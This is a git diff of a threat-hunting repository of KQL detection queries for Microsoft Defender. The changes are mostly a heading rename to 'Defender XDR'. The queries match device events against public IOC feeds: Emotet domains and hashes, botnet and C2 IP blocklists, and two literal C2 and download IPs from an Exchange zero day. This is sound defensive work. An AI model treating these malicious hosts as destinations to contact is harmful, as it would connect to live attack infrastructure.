Hunting/TI Feed - 2022-TalosEmotetDomain.md +++ b/Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md @@ -4,7 +4,7 @@ #### Feed information: https://blog.talosintelligence.com/emotet-coming-in-hot/ #### Feed link: https://github.com/Cisco-Talos/IOCs/blob/main/2022/11/Emotet_contacted_domains.txt -### Defender For Endpoint +### Defender XDR ``` let EmotetDomain = externaldata(Domain: string)[@"https://raw.githubusercontent.com/Cisco-Talos/IOCs/main/2022/11/Emotet_contacted_domains.txt"] with (format="txt", ignoreFirstRecord=True); DeviceNetworkEvents diff --git a/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md b/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md index 8ea4e73..98c861b 100644 --- a/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md +++ b/Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md @@ -4,7 +4,7 @@ #### Feed information: https://blog.talosintelligence.com/emotet-coming-in-hot/ #### Feed link: https://github.com/Cisco-Talos/IOCs/blob/main/2022/11/Emotet_parents.txt -### Defender For Endpoint +### Defender XDR ``` let Emotetsha256 = externaldata(sha256: string)[@"https://githubraw.com/Cisco-Talos/IOCs/main/2022/11/Emotet_parents.txt"] with (format="txt", ignoreFirstRecord=True); DeviceFileEvents diff --git a/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md b/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md index 6a4fb86..373fc99 100644 --- a/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md +++ b/Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md @@ -4,7 +4,7 @@ #### Feed information: https://feodotracker.abuse.ch/blocklist/ #### Feed link: https://feodotracker.abuse.ch/downloads/ipblocklist.txt -### Defender For Endpoint +### Defender XDR ``` let BotnetIP = externaldata(IP: string)[@"https://feodotracker.abuse.ch/downloads/ipblocklist.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -53,4 +53,4 @@ DeviceNetworkEvents DeviceName, InitiatingProcessCommandLine, InitiatingProcessFolderPath -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md b/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md index c9bbfdc..0bc6b86 100644 --- a/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md +++ b/Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md @@ -3,7 +3,7 @@ #### Source: Abuse.ch #### Feed link: https://sslbl.abuse.ch/blacklist/sslipblacklist.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://sslbl.abuse.ch/blacklist/sslipblacklist.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - AbuseCHMD5Malware.md b/Threat Hunting/TI Feed - AbuseCHMD5Malware.md index c1f2017..b6bbfc8 100644 --- a/Threat Hunting/TI Feed - AbuseCHMD5Malware.md +++ b/Threat Hunting/TI Feed - AbuseCHMD5Malware.md @@ -4,7 +4,7 @@ #### Feed information: https://bazaar.abuse.ch/faq/#tos #### Feed link: https://bazaar.abuse.ch/export/txt/md5/recent/ -### Defender For Endpoint +### Defender XDR ``` let MalwareSampleMD5 = externaldata(MD5: string)[@"https://bazaar.abuse.ch/export/txt/md5/recent"] with (format="txt", ignoreFirstRecord=True); let MD5Regex = '[a-f0-9]{32}'; @@ -29,4 +29,4 @@ let MaliciousMD5 = materialize ( ); DeviceFileEvents | where MD5 has_any (MaliciousMD5) -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md b/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md index b4d1390..a0b32a3 100644 --- a/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md +++ b/Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md @@ -4,7 +4,7 @@ #### Feed information: https://www.blocklist.de/en/export.html #### Feed link: https://lists.blocklist.de/lists/all.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://lists.blocklist.de/lists/all.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -33,4 +33,4 @@ DeviceNetworkEvents | where RemoteIP in (MaliciousIP) | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - C2IPFeed.md b/Threat Hunting/TI Feed - C2IPFeed.md index eceacfa..82d6cec 100644 --- a/Threat Hunting/TI Feed - C2IPFeed.md +++ b/Threat Hunting/TI Feed - C2IPFeed.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/drb-ra/C2IntelFeeds #### Feed link: https://github.com/drb-ra/C2IntelFeeds/blob/master/feeds/IPC2s-30day.csv -### Defender For Endpoint +### Defender XDR ``` let C2IntelFeeds = externaldata(IP: string, ioc:string)[@"https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/IPC2s-30day.csv"] with (format="csv", ignoreFirstRecord=True); let IPList = C2IntelFeeds diff --git a/Threat Hunting/TI Feed - C2URLFeed.md b/Threat Hunting/TI Feed - C2URLFeed.md index 94f2d19..cbcffd0 100644 --- a/Threat Hunting/TI Feed - C2URLFeed.md +++ b/Threat Hunting/TI Feed - C2URLFeed.md @@ -6,7 +6,7 @@ **Preferable use the URL filter abuse detection, to prevent false positives**: [Detection](./TI%20Feed%20-%20C2URLFeedFilterAbuse.md) -### Defender For Endpoint +### Defender XDR ``` // Collect Remote data let C2IntelFeeds = externaldata(Domain: string, ioc:string, path:string, IP:string)[@"https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/domainC2swithURLwithIP.csv"] with (format="csv", ignoreFirstRecord=True); diff --git a/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md b/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md index e9dcbfd..820eba8 100644 --- a/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md +++ b/Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/drb-ra/C2IntelFeeds #### Feed link: https://github.com/drb-ra/C2IntelFeeds/blob/master/feeds/domainC2swithURLwithIP-filter-abused.csv -### Defender For Endpoint +### Defender XDR ``` // Collect Remote data let C2IntelFeeds = externaldata(Domain: string, ioc:string, path:string, IP:string)[@"https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/domainC2swithURLwithIP-filter-abused.csv"] with (format="csv", ignoreFirstRecord=True); diff --git a/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md b/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md index 6251310..3be092b 100644 --- a/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md +++ b/Threat Hunting/TI Feed - CERT-FR-MISPFeed.md @@ -3,7 +3,7 @@ #### Source: CERT-FR #### Feed link: https://misp.cert.ssi.gouv.fr/feed-misp/hashes.csv -### Defender For Endpoint +### Defender XDR ``` let CERTFRFeed = externaldata (SHA1: string, threatid :string) ["https://misp.cert.ssi.gouv.fr/feed-misp/hashes.csv"]; diff --git a/Threat Hunting/TI Feed - DigitalSideDomains.md b/Threat Hunting/TI Feed - DigitalSideDomains.md index 0dc69e9..f784640 100644 --- a/Threat Hunting/TI Feed - DigitalSideDomains.md +++ b/Threat Hunting/TI Feed - DigitalSideDomains.md @@ -4,7 +4,7 @@ #### Feed information: https://osint.digitalside.it/ #### Feed link: https://osint.digitalside.it/Threat-Intel/lists/latestdomains.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(Domain: string)[@"https://osint.digitalside.it/Threat-Intel/lists/latestdomains.txt"] with (format="txt", ignoreFirstRecord=True); DeviceNetworkEvents @@ -18,4 +18,4 @@ let ThreatIntelFeed = externaldata(Domain: string)[@"https://osint.digitalside.i DeviceNetworkEvents | where RemoteUrl has_any (ThreatIntelFeed) | project TimeGenerated, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountDomain, InitiatingProcessAccountName -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - DigitalSideIPs.md b/Threat Hunting/TI Feed - DigitalSideIPs.md index 685f6d3..d0c5188 100644 --- a/Threat Hunting/TI Feed - DigitalSideIPs.md +++ b/Threat Hunting/TI Feed - DigitalSideIPs.md @@ -4,7 +4,7 @@ #### Feed information: https://osint.digitalside.it/ #### Feed link: https://osint.digitalside.it/Threat-Intel/lists/latestips.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(DestIP: string)[@"https://osint.digitalside.it/Threat-Intel/lists/latestips.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -34,4 +34,4 @@ DeviceNetworkEvents | extend GeoIPInfo = geo_info_from_ip_address(RemoteIP) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city), latitude = tostring(parse_json(GeoIPInfo).latitude), longitude = tostring(parse_json(GeoIPInfo).longitude) | project-reorder TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessAccountName -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - JA3Blacklist.md b/Threat Hunting/TI Feed - JA3Blacklist.md index d9da261..3dded5d 100644 --- a/Threat Hunting/TI Feed - JA3Blacklist.md +++ b/Threat Hunting/TI Feed - JA3Blacklist.md @@ -4,7 +4,7 @@ #### Feed information: https://sslbl.abuse.ch/blacklist/#ja3-fingerprints-csv #### Feed link: https://sslbl.abuse.ch/blacklist/ja3_fingerprints.csv -### Defender For Endpoint +### Defender XDR ```KQL let JA3Feed = externaldata(ja3_md5:string) [@"https://sslbl.abuse.ch/blacklist/ja3_fingerprints.csv"] with (format="txt", ignoreFirstRecord=True); // Extract JA3 Hashes From Feed diff --git a/Threat Hunting/TI Feed - MISP IPSum level 4.md b/Threat Hunting/TI Feed - MISP IPSum level 4.md index 700dddb..28c8059 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 4.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 4.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/4.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/4.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 5.md b/Threat Hunting/TI Feed - MISP IPSum level 5.md index 284d941..d42f2a3 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 5.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 5.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 6.md b/Threat Hunting/TI Feed - MISP IPSum level 6.md index e61ac2b..738b5a4 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 6.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 6.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/6.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/6.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 7.md b/Threat Hunting/TI Feed - MISP IPSum level 7.md index ce56156..ac3358a 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 7.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 7.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/7.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/7.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MISP IPSum level 8.md b/Threat Hunting/TI Feed - MISP IPSum level 8.md index 280ceb9..7ccb174 100644 --- a/Threat Hunting/TI Feed - MISP IPSum level 8.md +++ b/Threat Hunting/TI Feed - MISP IPSum level 8.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/stamparm/ipsum/ #### Feed link: https://raw.githubusercontent.com/stamparm/ipsum/master/levels/8.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/8.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md b/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md index dc27e03..0e563aa 100644 --- a/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md +++ b/Threat Hunting/TI Feed - MontySecurity C2 Tracker All IPs.md @@ -4,7 +4,7 @@ #### Feed information: https://github.com/montysecurity/C2-Tracker #### Feed link: https://raw.githubusercontent.com/montysecurity/C2-Tracker/main/data/all.txt -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(DestIP: string)[@"https://raw.githubusercontent.com/montysecurity/C2-Tracker/main/data/all.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md b/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md index ecbf206..5423c6b 100644 --- a/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md +++ b/Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md @@ -4,7 +4,7 @@ #### Feed information: https://threatfox.abuse.ch/faq/#tos #### Feed link: https://threatfox.abuse.ch/downloads/hostfile/ -### Defender For Endpoint +### Defender XDR ``` let ThreatIntelFeed = externaldata(LineInfo: string)[@"https://threatfox.abuse.ch/downloads/hostfile/"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; @@ -35,4 +35,4 @@ let MalwareDomains = materialize ( DeviceNetworkEvents | where RemoteUrl has_any (MalwareDomains) | project TimeGenerated, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountDomain, InitiatingProcessAccountName -``` \ No newline at end of file +``` diff --git a/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md b/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md index 9233fb4..a1e174a 100644 --- a/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md +++ b/Threat Hunting/TI Feed - ThreatviewioDomain-High-Confidence-Feed.md @@ -4,7 +4,7 @@ #### Feed information: https://threatview.io/ #### Feed link: https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(Domain: string)[@"https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md b/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md index de90f16..2754a6c 100644 --- a/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md +++ b/Threat Hunting/TI Feed - ThreatviewioIP-High-Confidence-Feed.md @@ -4,7 +4,7 @@ #### Feed information: https://threatview.io/ #### Feed link: https://threatview.io/Downloads/IP-High-Confidence-Feed.txt -### Defender For Endpoint +### Defender XDR ```KQL let ThreatIntelFeed = externaldata(DestIP: string)[@"https://threatview.io/Downloads/IP-High-Confidence-Feed.txt"] with (format="txt", ignoreFirstRecord=True); let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'; diff --git a/Threat Hunting/TI Feed - TwitterIOCs.md b/Threat Hunting/TI Feed - TwitterIOCs.md index 39a6aed..9d1a8d6 100644 --- a/Threat Hunting/TI Feed - TwitterIOCs.md +++ b/Threat Hunting/TI Feed - TwitterIOCs.md @@ -21,7 +21,7 @@ Source: https://tweetfeed.live/ Feed link: https://raw.githubusercontent.com/0xDanielLopez/TweetFeed/master/month.csv -### Defender For Endpoint +### Defender XDR ``` // Collect external data from @0xDanielLopez Github. There is a UI for TweetFeed, this can be accessed on https://tweetfeed.live/ // TweetFeed collects Indicators of Compromise (IOCs) shared by the infosec community at Twitter. Here you will find malicious URLs, domains, IPs, and SHA256/MD5 hashes. diff --git a/Threat Hunting/TI Feed - ipfs_phishing.md b/Threat Hunting/TI Feed - ipfs_phishing.md index e46bdfd..22fc65d 100644 --- a/Threat Hunting/TI Feed - ipfs_phishing.md +++ b/Threat Hunting/TI Feed - ipfs_phishing.md @@ -26,7 +26,7 @@ The risk targeted by this detection rule is the exploitation of IPFS in phishing - [Cisco-Talos IOCs](https://github.com/Cisco-Talos/IOCs/tree/main/2022/11) - [Volexity Threat Intel](https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt) -## Defender For Endpoint +## Defender XDR ```KQL //check for phishing emails potentially using ipfs to host malicious content used in phishing campaigns. diff --git a/Windows Security Events/ListADDelegations.md b/Windows Security Events/ListADDelegations.md index 6af1c93..a2a2f6c 100644 --- a/Windows Security Events/ListADDelegations.md +++ b/Windows Security Events/ListADDelegations.md @@ -17,4 +17,4 @@ SecurityEvent | extend AllData = tostring(parse_xml(EventData)) | extend DelegatedTo = parse_json(AllData)['EventData']['Data'][20]["#text"] | where not (DelegatedTo in (exclusions)) -``` \ No newline at end of file +``` diff --git a/Zero Day Detection/MS Exchange Zero Day Sept 2022.md b/Zero Day Detection/MS Exchange Zero Day Sept 2022.md index c44bdb9..4b98f50 100644 --- a/Zero Day Detection/MS Exchange Zero Day Sept 2022.md +++ b/Zero Day Detection/MS Exchange Zero Day Sept 2022.md @@ -4,7 +4,7 @@ Blog about the (unconfirmed) zero day in Exchange: [Link](https://www.gteltsc.vn -### Defender For Endpoint +### Defender XDR ``` let C2IP = '137.184.67.33'; let DownloadIP = '206.188.196.77';